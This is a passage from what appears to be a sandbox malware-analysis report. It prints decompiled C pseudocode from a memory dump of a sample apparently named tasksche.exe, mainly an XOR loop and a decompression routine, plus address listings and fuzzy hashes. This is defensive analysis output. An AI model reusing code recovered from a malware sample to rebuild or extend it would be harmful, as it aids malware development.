                                                                                              				_t244 = 0;
                                                                                              				do {
                                                                                              					_t226 =  *((intOrPtr*)(_a4 + 0xf4)) + _t244;
                                                                                              					_t303 =  *(_t364 + _t244 - 0x20) ^  *_t226;
                                                                                              					_t244 = _t244 + 4;
                                                                                              					 *_t226 = _t303 ^  *(_t364 + _t244 - 0x44);
                                                                                              				} while (_t244 < 0x20);
                                                                                              				return _t226;
                                                                                              			}






























































                                                                                              0x0040498f
                                                                                              0x0040499f
                                                                                              0x004049a3
                                                                                              0x004049ab
                                                                                              0x004049b1
                                                                                              0x004049b8
                                                                                              0x004049ce
                                                                                              0x004049d4
                                                                                              0x004049da
                                                                                              0x004049dd
                                                                                              0x004049e4
                                                                                              0x004049eb
                                                                                              0x004049f2
                                                                                              0x004049f9
                                                                                              0x004049fc
                                                                                              0x00404a03
                                                                                              0x00404a03
                                                                                              0x00404a14
                                                                                              0x00404a16
                                                                                              0x00404a23
                                                                                              0x00404a25
                                                                                              0x00404a28
                                                                                              0x00404a2e
                                                                                              0x00404a31
                                                                                              0x00404a36
                                                                                              0x00404a38
                                                                                              0x00404a3b
                                                                                              0x00404a3d
                                                                                              0x00404a4b
                                                                                              0x00404a4e
                                                                                              0x00404a51
                                                                                              0x00404a54
                                                                                              0x00404a5a
                                                                                              0x00404a5c
                                                                                              0x00404a67
                                                                                              0x00404a6a
                                                                                              0x00404a6d
                                                                                              0x00404a70
                                                                                              0x00404a76
                                                                                              0x00404a79
                                                                                              0x00404a7c
                                                                                              0x00404a81
                                                                                              0x00404a87
                                                                                              0x00404a8a
                                                                                              0x00404a8d
                                                                                              0x00404a93
                                                                                              0x00404a96
                                                                                              0x00404a99
                                                                                              0x00404a9c
                                                                                              0x00404a9f
                                                                                              0x00404aac
                                                                                              0x00404ab2
                                                                                              0x00404ab5
                                                                                              0x00404ab8
                                                                                              0x00404abb
                                                                                              0x00404abe
                                                                                              0x00404ac1
                                                                                              0x00404acc
                                                                                              0x00404ad1
                                                                                              0x00404ad7
                                                                                              0x00404ada
                                                                                              0x00404add
                                                                                              0x00404ae3
                                                                                              0x00404ae6
                                                                                              0x00404af3
                                                                                              0x00404af9
                                                                                              0x00404afc
                                                                                              0x00404aff
                                                                                              0x00404b02
                                                                                              0x00404b05
                                                                                              0x00404b08
                                                                                              0x00404b0b
                                                                                              0x00404b0e
                                                                                              0x00404b19
                                                                                              0x00404b1e
                                                                                              0x00404b24
                                                                                              0x00404b27
                                                                                              0x00404b2a
                                                                                              0x00404b30
                                                                                              0x00404b33
                                                                                              0x00404b3e
                                                                                              0x00404b43
                                                                                              0x00404b49
                                                                                              0x00404b4c
                                                                                              0x00404b4f
                                                                                              0x00404b52
                                                                                              0x00404b55
                                                                                              0x00404b58
                                                                                              0x00404b5b
                                                                                              0x00404b66
                                                                                              0x00404b6b
                                                                                              0x00404b6e
                                                                                              0x00404b74
                                                                                              0x00404b76
                                                                                              0x00404b79
                                                                                              0x00404b7c
                                                                                              0x00404b85
                                                                                              0x00404b90
                                                                                              0x00404b93
                                                                                              0x00404b96
                                                                                              0x00404ba1
                                                                                              0x00404ba6
                                                                                              0x00404bac
                                                                                              0x00404bae
                                                                                              0x00404bb1
                                                                                              0x00404bb4
                                                                                              0x00404bb7
                                                                                              0x00404bbc
                                                                                              0x00404bc4
                                                                                              0x00404bc7
                                                                                              0x00404bc9
                                                                                              0x00404bcf
                                                                                              0x00404bda
                                                                                              0x00404bdd
                                                                                              0x00404be0
                                                                                              0x00404be7
                                                                                              0x00404bee
                                                                                              0x00404bf3
                                                                                              0x00404bf9
                                                                                              0x00404bfc
                                                                                              0x00404bff
                                                                                              0x00404c02
                                                                                              0x00404c05
                                                                                              0x00404c0a
                                                                                              0x00404c12
                                                                                              0x00404c15
                                                                                              0x00404c17
                                                                                              0x00404c1d
                                                                                              0x00404c28
                                                                                              0x00404c2b
                                                                                              0x00404c2e
                                                                                              0x00404c3b
                                                                                              0x00404c41
                                                                                              0x00404c44
                                                                                              0x00404c47
                                                                                              0x00404c4a
                                                                                              0x00404c4d
                                                                                              0x00404c50
                                                                                              0x00404c53
                                                                                              0x00404c58
                                                                                              0x00404c60
                                                                                              0x00404c63
                                                                                              0x00404c65
                                                                                              0x00404c6b
                                                                                              0x00404c6e
                                                                                              0x00404c71
                                                                                              0x00404c79
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404a00
                                                                                              0x00404a00
                                                                                              0x00404c81
                                                                                              0x00404c84
                                                                                              0x00404c91
                                                                                              0x00404c93
                                                                                              0x00404c95
                                                                                              0x00404c9c
                                                                                              0x00404c9e
                                                                                              0x00404ca4

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: 8e8f698dc4288f7cd721a7a81a634b87765ee1de91585cf515aab87a68fe5fee
                                                                                              • Instruction ID: d9eb52a2d6ff44a43e3580116b86408f9a206631cbab7b39ea8bb55ae5343344
                                                                                              • Opcode Fuzzy Hash: 8e8f698dc4288f7cd721a7a81a634b87765ee1de91585cf515aab87a68fe5fee
                                                                                              • Instruction Fuzzy Hash: 81C126B2D002289BDF44CF9AD8405EEFBF2BFC8310F2AC1A6D81477615D6346A529F91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 74%
                                                                                              			E00416C3F(void* __ecx, unsigned int _a4) {
                                                                                              				signed int _v8;
                                                                                              				unsigned int _v12;
                                                                                              				unsigned int _v16;
                                                                                              				char _v32;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t398;
                                                                                              				signed int _t399;
                                                                                              				unsigned int _t400;
                                                                                              				signed int _t403;
                                                                                              				intOrPtr* _t405;
                                                                                              				signed int _t407;
                                                                                              				unsigned int _t408;
                                                                                              				signed int _t411;
                                                                                              				signed int _t412;
                                                                                              				signed int* _t420;
                                                                                              				intOrPtr _t421;
                                                                                              				unsigned int _t423;
                                                                                              				unsigned int _t432;
                                                                                              				unsigned int _t434;
                                                                                              				signed int _t435;
                                                                                              				unsigned int _t438;
                                                                                              				signed int _t441;
                                                                                              				signed int _t442;
                                                                                              				signed int _t444;
                                                                                              				signed int _t445;
                                                                                              				signed int* _t446;
                                                                                              				char* _t447;
                                                                                              				unsigned int _t449;
                                                                                              				unsigned int _t451;
                                                                                              				signed int _t453;
                                                                                              				signed int _t456;
                                                                                              				signed int _t457;
                                                                                              				signed int _t464;
                                                                                              				unsigned int _t465;
                                                                                              				signed int _t468;
                                                                                              				signed int _t469;
                                                                                              				signed int* _t477;
                                                                                              				unsigned int _t479;
                                                                                              				unsigned int _t482;
                                                                                              				signed int _t483;
                                                                                              				unsigned int _t486;
                                                                                              				signed int _t489;
                                                                                              				signed int _t490;
                                                                                              				signed int _t491;
                                                                                              				unsigned int _t492;
                                                                                              				signed int _t495;
                                                                                              				signed int _t496;
                                                                                              				signed int _t497;
                                                                                              				unsigned int _t498;
                                                                                              				signed int _t505;
                                                                                              				unsigned int _t506;
                                                                                              				signed int _t509;
                                                                                              				signed int _t510;
                                                                                              				signed int _t515;
                                                                                              				intOrPtr _t517;
                                                                                              				void* _t521;
                                                                                              				signed int _t522;
                                                                                              				void* _t526;
                                                                                              				signed int _t527;
                                                                                              				signed int _t530;
                                                                                              				signed int _t531;
                                                                                              				signed int _t532;
                                                                                              				signed int _t537;
                                                                                              				void* _t539;
                                                                                              				intOrPtr* _t540;
                                                                                              				signed int _t541;
                                                                                              				intOrPtr* _t543;
                                                                                              				intOrPtr* _t544;
                                                                                              				void* _t547;
                                                                                              				signed int _t548;
                                                                                              				intOrPtr* _t551;
                                                                                              				signed int _t554;
                                                                                              				signed int _t555;
                                                                                              				signed int _t558;
                                                                                              				unsigned int _t559;
                                                                                              				void* _t561;
                                                                                              				signed int _t562;
                                                                                              				signed int _t565;
                                                                                              				intOrPtr* _t568;
                                                                                              				signed int _t569;
                                                                                              				signed int _t570;
                                                                                              				intOrPtr* _t571;
                                                                                              				signed int _t574;
                                                                                              				signed int _t576;
                                                                                              				unsigned int _t578;
                                                                                              				void* _t580;
                                                                                              				signed int _t583;
                                                                                              				signed int _t585;
                                                                                              				unsigned int _t587;
                                                                                              				void* _t589;
                                                                                              				signed int _t593;
                                                                                              				char* _t604;
                                                                                              				signed int _t605;
                                                                                              				void* _t608;
                                                                                              				void* _t612;
                                                                                              				signed int _t615;
                                                                                              				signed int _t618;
                                                                                              				unsigned int _t624;
                                                                                              				signed int _t625;
                                                                                              				unsigned int _t627;
                                                                                              				signed int _t633;
                                                                                              				unsigned int _t635;
                                                                                              				void* _t637;
                                                                                              				signed int _t640;
                                                                                              				signed int _t642;
                                                                                              				unsigned int _t648;
                                                                                              				signed int _t649;
                                                                                              				void* _t651;
                                                                                              				signed int _t656;
                                                                                              				unsigned int _t658;
                                                                                              				void* _t660;
                                                                                              				void* _t662;
                                                                                              				signed int _t665;
                                                                                              				void* _t668;
                                                                                              				void* _t670;
                                                                                              				signed int _t673;
                                                                                              				void* _t676;
                                                                                              				void* _t683;
                                                                                              				signed int _t686;
                                                                                              				signed int _t695;
                                                                                              				signed int _t696;
                                                                                              				signed int _t697;
                                                                                              				signed int _t713;
                                                                                              				signed int _t733;
                                                                                              				signed int _t736;
                                                                                              				signed int _t750;
                                                                                              				intOrPtr* _t753;
                                                                                              				intOrPtr* _t758;
                                                                                              				void* _t760;
                                                                                              				void* _t761;
                                                                                              				void* _t767;
                                                                                              
                                                                                              				_t760 = __ecx;
                                                                                              				 *((char*)(__ecx + 0x4c58)) = 1;
                                                                                              				if( *((char*)(__ecx + 0x4c48)) != 0) {
                                                                                              					L4:
                                                                                              					_t758 = _t760 + 4;
                                                                                              					while(1) {
                                                                                              						 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6dc);
                                                                                              						if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
                                                                                              							goto L15;
                                                                                              						} else {
                                                                                              							_t540 = _t760 + 0x80;
                                                                                              						}
                                                                                              						while(1) {
                                                                                              							L7:
                                                                                              							_t767 =  *_t758 -  *_t540 +  *((intOrPtr*)(_t760 + 0x88)) - 1;
                                                                                              							if(_t767 <= 0 && (_t767 != 0 ||  *((intOrPtr*)(_t760 + 8)) <  *((intOrPtr*)(_t760 + 0x84)))) {
                                                                                              								break;
                                                                                              							}
                                                                                              							if( *((char*)(_t760 + 0x90)) != 0) {
                                                                                              								L104:
                                                                                              								return E00415346(_t760);
                                                                                              							}
                                                                                              							_push(_t540);
                                                                                              							_push(_t758);
                                                                                              							_t517 = E0041450F(_t540, _t760);
                                                                                              							if(_t517 == 0) {
                                                                                              								L105:
                                                                                              								return _t517;
                                                                                              							} else {
                                                                                              								_t521 = E0041462B(_t540, _t760, _t758, _t540, _t760 + 0x94);
                                                                                              								if(_t521 != 0) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									return _t521;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t522 = E004123EB(_t540, _t760);
                                                                                              						__eflags = _t522;
                                                                                              						if(_t522 == 0) {
                                                                                              							goto L104;
                                                                                              						}
                                                                                              						L15:
                                                                                              						_t398 =  *((intOrPtr*)(_t760 + 0x4b30));
                                                                                              						_t574 =  *(_t760 + 0x70);
                                                                                              						__eflags = (_t398 - _t574 &  *(_t760 + 0xe6dc)) - 0x1004;
                                                                                              						if((_t398 - _t574 &  *(_t760 + 0xe6dc)) >= 0x1004) {
                                                                                              							L21:
                                                                                              							_t399 = E0040978C(_t758);
                                                                                              							_t527 =  *(_t760 + 0x118);
                                                                                              							_t400 = _t399 & 0x0000fffe;
                                                                                              							__eflags = _t400 -  *((intOrPtr*)(_t760 + 0x98 + _t527 * 4));
                                                                                              							if(_t400 >=  *((intOrPtr*)(_t760 + 0x98 + _t527 * 4))) {
                                                                                              								_t695 = 0xf;
                                                                                              								_t576 = _t527 + 1;
                                                                                              								__eflags = _t576 - _t695;
                                                                                              								if(_t576 >= _t695) {
                                                                                              									L29:
                                                                                              									_t578 =  *(_t758 + 4) + _t695;
                                                                                              									 *(_t758 + 4) = _t578 & 0x00000007;
                                                                                              									 *_t758 =  *_t758 + (_t578 >> 3);
                                                                                              									_t580 = 0x10;
                                                                                              									_t403 = (_t400 -  *((intOrPtr*)(_t760 + 0x94 + _t695 * 4)) >> _t580 - _t695) +  *((intOrPtr*)(_t760 + 0xd8 + _t695 * 4));
                                                                                              									__eflags = _t403 -  *((intOrPtr*)(_t760 + 0x94));
                                                                                              									if(_t403 >=  *((intOrPtr*)(_t760 + 0x94))) {
                                                                                              										_t403 = 0;
                                                                                              										__eflags = 0;
                                                                                              									}
                                                                                              									_t530 =  *(_t760 + 0xd1c + _t403 * 2) & 0x0000ffff;
                                                                                              									goto L32;
                                                                                              								} else {
                                                                                              									_t571 = _t760 + 0x98 + _t576 * 4;
                                                                                              									while(1) {
                                                                                              										__eflags = _t400 -  *_t571;
                                                                                              										if(_t400 <  *_t571) {
                                                                                              											_t695 = _t576;
                                                                                              											goto L29;
                                                                                              										}
                                                                                              										_t576 = _t576 + 1;
                                                                                              										_t571 = _t571 + 4;
                                                                                              										__eflags = _t576 - 0xf;
                                                                                              										if(_t576 < 0xf) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              											goto L29;
                                                                                              										}
                                                                                              									}
                                                                                              									goto L29;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t683 = 0x10;
                                                                                              								_t515 = _t400 >> _t683 - _t527;
                                                                                              								_t686 = ( *(_t515 + _t760 + 0x11c) & 0x000000ff) +  *(_t758 + 4);
                                                                                              								 *_t758 =  *_t758 + (_t686 >> 3);
                                                                                              								 *(_t758 + 4) = _t686 & 0x00000007;
                                                                                              								_t530 =  *(_t760 + 0x51c + _t515 * 2) & 0x0000ffff;
                                                                                              								L32:
                                                                                              								__eflags = _t530 - 0x100;
                                                                                              								if(_t530 >= 0x100) {
                                                                                              									__eflags = _t530 - 0x106;
                                                                                              									if(_t530 < 0x106) {
                                                                                              										__eflags = _t530 - 0x100;
                                                                                              										if(_t530 != 0x100) {
                                                                                              											__eflags = _t530 - 0x101;
                                                                                              											if(_t530 != 0x101) {
                                                                                              												_t531 = _t530 + 0xfffffefe;
                                                                                              												__eflags = _t531;
                                                                                              												_t405 = _t760 + 0x54 + _t531 * 4;
                                                                                              												_v16 =  *_t405;
                                                                                              												_t583 = _t531;
                                                                                              												if(_t531 == 0) {
                                                                                              													L127:
                                                                                              													 *((intOrPtr*)(_t760 + 0x54)) = _v16;
                                                                                              													_t407 = E0040978C(_t758);
                                                                                              													_t532 =  *(_t760 + 0x2ddc);
                                                                                              													_t408 = _t407 & 0x0000fffe;
                                                                                              													__eflags = _t408 -  *((intOrPtr*)(_t760 + 0x2d5c + _t532 * 4));
                                                                                              													if(_t408 >=  *((intOrPtr*)(_t760 + 0x2d5c + _t532 * 4))) {
                                                                                              														_t696 = 0xf;
                                                                                              														_t585 = _t532 + 1;
                                                                                              														__eflags = _t585 - _t696;
                                                                                              														if(_t585 >= _t696) {
                                                                                              															L135:
                                                                                              															_t587 =  *(_t758 + 4) + _t696;
                                                                                              															 *(_t758 + 4) = _t587 & 0x00000007;
                                                                                              															 *_t758 =  *_t758 + (_t587 >> 3);
                                                                                              															_t589 = 0x10;
                                                                                              															_t411 = (_t408 -  *((intOrPtr*)(_t760 + 0x2d58 + _t696 * 4)) >> _t589 - _t696) +  *((intOrPtr*)(_t760 + 0x2d9c + _t696 * 4));
                                                                                              															__eflags = _t411 -  *((intOrPtr*)(_t760 + 0x2d58));
                                                                                              															if(_t411 >=  *((intOrPtr*)(_t760 + 0x2d58))) {
                                                                                              																_t411 = 0;
                                                                                              																__eflags = 0;
                                                                                              															}
                                                                                              															_t412 =  *(_t760 + 0x39e0 + _t411 * 2) & 0x0000ffff;
                                                                                              															L138:
                                                                                              															__eflags = _t412 - 8;
                                                                                              															if(_t412 >= 8) {
                                                                                              																_t537 = (_t412 >> 2) - 1;
                                                                                              																_v12 = ((_t412 & 0x00000003 | 0x00000004) << _t537) + 2;
                                                                                              																__eflags = _t537;
                                                                                              																if(_t537 > 0) {
                                                                                              																	_t438 = E0040978C(_t758);
                                                                                              																	_t608 = 0x10;
                                                                                              																	_v12 = _v12 + (_t438 >> _t608 - _t537);
                                                                                              																	_t441 =  *(_t758 + 4) + _t537;
                                                                                              																	 *_t758 =  *_t758 + (_t441 >> 3);
                                                                                              																	_t442 = _t441 & 0x00000007;
                                                                                              																	__eflags = _t442;
                                                                                              																	 *(_t758 + 4) = _t442;
                                                                                              																}
                                                                                              															} else {
                                                                                              																_v12 = _t412 + 2;
                                                                                              															}
                                                                                              															__eflags =  *((char*)(_t760 + 0x4c38));
                                                                                              															 *(_t760 + 0x68) = _v12;
                                                                                              															if( *((char*)(_t760 + 0x4c38)) == 0) {
                                                                                              																_a4 = _v12;
                                                                                              																_t420 = _t760 + 0x70;
                                                                                              																_t697 =  *_t420;
                                                                                              																_t593 = _t697 - _v16;
                                                                                              																_t539 =  *((intOrPtr*)(_t760 + 0xe6d8)) + 0xffffefff;
                                                                                              																_v8 = _t593;
                                                                                              																__eflags = _t593 - _t539;
                                                                                              																if(_t593 >= _t539) {
                                                                                              																	goto L162;
                                                                                              																}
                                                                                              																__eflags = _t697 - _t539;
                                                                                              																if(_t697 >= _t539) {
                                                                                              																	goto L162;
                                                                                              																}
                                                                                              																_t421 =  *((intOrPtr*)(_t760 + 0x4b34));
                                                                                              																_t543 = _t421 + _t593;
                                                                                              																_v8 = _t421 + _t697;
                                                                                              																_t423 = _v12;
                                                                                              																 *(_t760 + 0x70) = _t423 + _t697;
                                                                                              																__eflags = _v16 - _t423;
                                                                                              																if(_v16 >= _t423) {
                                                                                              																	__eflags = _t423 - 8;
                                                                                              																	if(_t423 < 8) {
                                                                                              																		L154:
                                                                                              																		__eflags = _a4;
                                                                                              																		if(_a4 > 0) {
                                                                                              																			__eflags = _a4 - 1;
                                                                                              																			_t604 = _v8;
                                                                                              																			 *_t604 =  *_t543;
                                                                                              																			if(_a4 > 1) {
                                                                                              																				__eflags = _a4 - 2;
                                                                                              																				 *((char*)(_t604 + 1)) =  *((intOrPtr*)(_t543 + 1));
                                                                                              																				if(_a4 > 2) {
                                                                                              																					__eflags = _a4 - 3;
                                                                                              																					 *((char*)(_t604 + 2)) =  *((intOrPtr*)(_t543 + 2));
                                                                                              																					if(_a4 > 3) {
                                                                                              																						__eflags = _a4 - 4;
                                                                                              																						 *((char*)(_t604 + 3)) =  *((intOrPtr*)(_t543 + 3));
                                                                                              																						if(_a4 > 4) {
                                                                                              																							__eflags = _a4 - 5;
                                                                                              																							 *((char*)(_t604 + 4)) =  *((intOrPtr*)(_t543 + 4));
                                                                                              																							if(_a4 > 5) {
                                                                                              																								__eflags = _a4 - 6;
                                                                                              																								 *((char*)(_t604 + 5)) =  *((intOrPtr*)(_t543 + 5));
                                                                                              																								if(_a4 > 6) {
                                                                                              																									 *((char*)(_t604 + 6)) =  *((intOrPtr*)(_t543 + 6));
                                                                                              																								}
                                                                                              																							}
                                                                                              																						}
                                                                                              																					}
                                                                                              																				}
                                                                                              																			}
                                                                                              																		}
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	_t432 = _v12 >> 3;
                                                                                              																	__eflags = _t432;
                                                                                              																	_v16 = _t432;
                                                                                              																	do {
                                                                                              																		E0041C290(_t543, _t758, _t760, _v8, _t543, 8);
                                                                                              																		_v8 = _v8 + 8;
                                                                                              																		_a4 = _a4 - 8;
                                                                                              																		_t761 = _t761 + 0xc;
                                                                                              																		_t543 = _t543 + 8;
                                                                                              																		_t362 =  &_v16;
                                                                                              																		 *_t362 = _v16 - 1;
                                                                                              																		__eflags =  *_t362;
                                                                                              																	} while ( *_t362 != 0);
                                                                                              																	goto L154;
                                                                                              																}
                                                                                              																__eflags = _t423 - 8;
                                                                                              																if(_t423 < 8) {
                                                                                              																	goto L154;
                                                                                              																}
                                                                                              																_t434 = _t423 >> 3;
                                                                                              																__eflags = _t434;
                                                                                              																_t605 = _t434;
                                                                                              																_t435 = _v8;
                                                                                              																do {
                                                                                              																	_a4 = _a4 - 8;
                                                                                              																	 *_t435 =  *_t543;
                                                                                              																	 *((char*)(_t435 + 1)) =  *((intOrPtr*)(_t543 + 1));
                                                                                              																	 *((char*)(_t435 + 2)) =  *((intOrPtr*)(_t543 + 2));
                                                                                              																	 *((char*)(_t435 + 3)) =  *((intOrPtr*)(_t543 + 3));
                                                                                              																	 *((char*)(_t435 + 4)) =  *((intOrPtr*)(_t543 + 4));
                                                                                              																	 *((char*)(_t435 + 5)) =  *((intOrPtr*)(_t543 + 5));
                                                                                              																	 *((char*)(_t435 + 6)) =  *((intOrPtr*)(_t543 + 6));
                                                                                              																	 *((char*)(_t435 + 7)) =  *((intOrPtr*)(_t543 + 7));
                                                                                              																	_t543 = _t543 + 8;
                                                                                              																	_t435 = _t435 + 8;
                                                                                              																	_t605 = _t605 - 1;
                                                                                              																	__eflags = _t605;
                                                                                              																} while (_t605 != 0);
                                                                                              																_v8 = _t435;
                                                                                              																goto L154;
                                                                                              															} else {
                                                                                              																_push( *(_t760 + 0xe6dc));
                                                                                              																_push(_t760 + 0x70);
                                                                                              																_push(_v16);
                                                                                              																_push(_v12);
                                                                                              																goto L77;
                                                                                              															}
                                                                                              														}
                                                                                              														_t544 = _t760 + 0x2d5c + _t585 * 4;
                                                                                              														while(1) {
                                                                                              															__eflags = _t408 -  *_t544;
                                                                                              															if(_t408 <  *_t544) {
                                                                                              																break;
                                                                                              															}
                                                                                              															_t585 = _t585 + 1;
                                                                                              															_t544 = _t544 + 4;
                                                                                              															__eflags = _t585 - 0xf;
                                                                                              															if(_t585 < 0xf) {
                                                                                              																continue;
                                                                                              															}
                                                                                              															goto L135;
                                                                                              														}
                                                                                              														_t696 = _t585;
                                                                                              														goto L135;
                                                                                              													}
                                                                                              													_t612 = 0x10;
                                                                                              													_t444 = _t408 >> _t612 - _t532;
                                                                                              													_t615 = ( *(_t444 + _t760 + 0x2de0) & 0x000000ff) +  *(_t758 + 4);
                                                                                              													 *_t758 =  *_t758 + (_t615 >> 3);
                                                                                              													 *(_t758 + 4) = _t615 & 0x00000007;
                                                                                              													_t412 =  *(_t760 + 0x31e0 + _t444 * 2) & 0x0000ffff;
                                                                                              													goto L138;
                                                                                              												} else {
                                                                                              													goto L126;
                                                                                              												}
                                                                                              												do {
                                                                                              													L126:
                                                                                              													 *_t405 =  *((intOrPtr*)(_t405 - 4));
                                                                                              													_t583 = _t583 - 1;
                                                                                              													_t405 = _t405 - 4;
                                                                                              													__eflags = _t583;
                                                                                              												} while (_t583 > 0);
                                                                                              												goto L127;
                                                                                              											}
                                                                                              											goto L107;
                                                                                              										}
                                                                                              										_push( &_v32);
                                                                                              										_t453 = E00414290(_t760, _t758);
                                                                                              										__eflags = _t453;
                                                                                              										if(_t453 == 0) {
                                                                                              											goto L104;
                                                                                              										}
                                                                                              										goto L103;
                                                                                              									} else {
                                                                                              										_t457 = _t530 - 0x106;
                                                                                              										__eflags = _t457 - 8;
                                                                                              										if(_t457 >= 8) {
                                                                                              											_t554 = (_t457 >> 2) - 1;
                                                                                              											_v16 = ((_t457 & 0x00000003 | 0x00000004) << _t554) + 2;
                                                                                              											__eflags = _t554;
                                                                                              											if(_t554 > 0) {
                                                                                              												_t506 = E0040978C(_t758);
                                                                                              												_t676 = 0x10;
                                                                                              												_v16 = _v16 + (_t506 >> _t676 - _t554);
                                                                                              												_t509 =  *(_t758 + 4) + _t554;
                                                                                              												 *_t758 =  *_t758 + (_t509 >> 3);
                                                                                              												_t510 = _t509 & 0x00000007;
                                                                                              												__eflags = _t510;
                                                                                              												 *(_t758 + 4) = _t510;
                                                                                              											}
                                                                                              										} else {
                                                                                              											_v16 = _t457 + 2;
                                                                                              										}
                                                                                              										_a4 = _v16;
                                                                                              										_t464 = E0040978C(_t758);
                                                                                              										_t733 =  *(_t760 + 0x1004);
                                                                                              										_t465 = _t464 & 0x0000fffe;
                                                                                              										__eflags = _t465 -  *((intOrPtr*)(_t760 + 0xf84 + _t733 * 4));
                                                                                              										if(_t465 >=  *((intOrPtr*)(_t760 + 0xf84 + _t733 * 4))) {
                                                                                              											_t555 = 0xf;
                                                                                              											_t633 = _t733 + 1;
                                                                                              											__eflags = _t633 - _t555;
                                                                                              											if(_t633 >= _t555) {
                                                                                              												L49:
                                                                                              												_t635 =  *(_t758 + 4) + _t555;
                                                                                              												 *(_t758 + 4) = _t635 & 0x00000007;
                                                                                              												 *_t758 =  *_t758 + (_t635 >> 3);
                                                                                              												_t637 = 0x10;
                                                                                              												_t468 = (_t465 -  *((intOrPtr*)(_t760 + 0xf80 + _t555 * 4)) >> _t637 - _t555) +  *((intOrPtr*)(_t760 + 0xfc4 + _t555 * 4));
                                                                                              												__eflags = _t468 -  *((intOrPtr*)(_t760 + 0xf80));
                                                                                              												if(_t468 >=  *((intOrPtr*)(_t760 + 0xf80))) {
                                                                                              													_t468 = 0;
                                                                                              													__eflags = 0;
                                                                                              												}
                                                                                              												_t469 =  *(_t760 + 0x1c08 + _t468 * 2) & 0x0000ffff;
                                                                                              												goto L52;
                                                                                              											} else {
                                                                                              												_t753 = _t760 + 0xf84 + _t633 * 4;
                                                                                              												while(1) {
                                                                                              													__eflags = _t465 -  *_t753;
                                                                                              													if(_t465 <  *_t753) {
                                                                                              														_t555 = _t633;
                                                                                              														goto L49;
                                                                                              													}
                                                                                              													_t633 = _t633 + 1;
                                                                                              													_t753 = _t753 + 4;
                                                                                              													__eflags = _t633 - 0xf;
                                                                                              													if(_t633 < 0xf) {
                                                                                              														continue;
                                                                                              													} else {
                                                                                              														goto L49;
                                                                                              													}
                                                                                              												}
                                                                                              												goto L49;
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t670 = 0x10;
                                                                                              											_t505 = _t465 >> _t670 - _t733;
                                                                                              											_t673 = ( *(_t505 + _t760 + 0x1008) & 0x000000ff) +  *(_t758 + 4);
                                                                                              											 *_t758 =  *_t758 + (_t673 >> 3);
                                                                                              											 *(_t758 + 4) = _t673 & 0x00000007;
                                                                                              											_t469 =  *(_t760 + 0x1408 + _t505 * 2) & 0x0000ffff;
                                                                                              											L52:
                                                                                              											__eflags = _t469 - 4;
                                                                                              											if(_t469 >= 4) {
                                                                                              												_t558 = (_t469 >> 1) - 1;
                                                                                              												_v12 = ((_t469 & 0x00000001 | 0x00000002) << _t558) + 1;
                                                                                              												__eflags = _t558;
                                                                                              												if(_t558 <= 0) {
                                                                                              													L71:
                                                                                              													_t559 = _v12;
                                                                                              													__eflags = _t559 - 0x100;
                                                                                              													if(_t559 > 0x100) {
                                                                                              														_a4 = _v16 + 1;
                                                                                              														__eflags = _t559 - 0x2000;
                                                                                              														if(_t559 > 0x2000) {
                                                                                              															_a4 = _a4 + 1;
                                                                                              															__eflags = _t559 - 0x40000;
                                                                                              															if(_t559 > 0x40000) {
                                                                                              																_t147 =  &_a4;
                                                                                              																 *_t147 = _a4 + 1;
                                                                                              																__eflags =  *_t147;
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              													__eflags =  *((char*)(_t760 + 0x4c38));
                                                                                              													_t640 = _a4;
                                                                                              													 *((intOrPtr*)(_t760 + 0x60)) =  *((intOrPtr*)(_t760 + 0x5c));
                                                                                              													 *((intOrPtr*)(_t760 + 0x5c)) =  *((intOrPtr*)(_t760 + 0x58));
                                                                                              													 *((intOrPtr*)(_t760 + 0x58)) =  *((intOrPtr*)(_t760 + 0x54));
                                                                                              													 *((intOrPtr*)(_t760 + 0x54)) = _t559;
                                                                                              													 *(_t760 + 0x68) = _t640;
                                                                                              													_t477 = _t760 + 0x70;
                                                                                              													if( *((char*)(_t760 + 0x4c38)) == 0) {
                                                                                              														_t736 =  *_t477;
                                                                                              														_v8 = _t640;
                                                                                              														_t642 = _t736 - _t559;
                                                                                              														_t561 =  *((intOrPtr*)(_t760 + 0xe6d8)) + 0xffffefff;
                                                                                              														_v16 = _t642;
                                                                                              														__eflags = _t642 - _t561;
                                                                                              														if(_t642 >= _t561) {
                                                                                              															L97:
                                                                                              															__eflags = _a4;
                                                                                              															if(_a4 <= 0) {
                                                                                              																while(1) {
                                                                                              																	 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6dc);
                                                                                              																	if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
                                                                                              																		goto L15;
                                                                                              																	} else {
                                                                                              																		_t540 = _t760 + 0x80;
                                                                                              																	}
                                                                                              																	goto L7;
                                                                                              																}
                                                                                              															}
                                                                                              															L98:
